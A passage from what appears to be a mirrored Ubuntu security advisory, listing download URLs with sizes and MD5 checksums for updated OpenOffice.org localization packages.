      Size/MD5:   399664 2ed0b9c6a1e0167b7b70aaa700fbe0bc
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-vi_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   384612 a842af4620ea6631c59b91e69ef92844
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-xh_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   405858 80d29f090504cc43f64d2eae8563cf31
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-zh-cn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1395414 8b880da4a72441c52e60f0c0d6611702
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-zh-tw_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1382284 2a9a7a61bbd4abc34a86b24db7084b9d
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-zu_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   398030 6c8aaed045da4ce55c4cc312e0b4aa1f





© 1998-2024 E-Soft Inc. All rights reserved.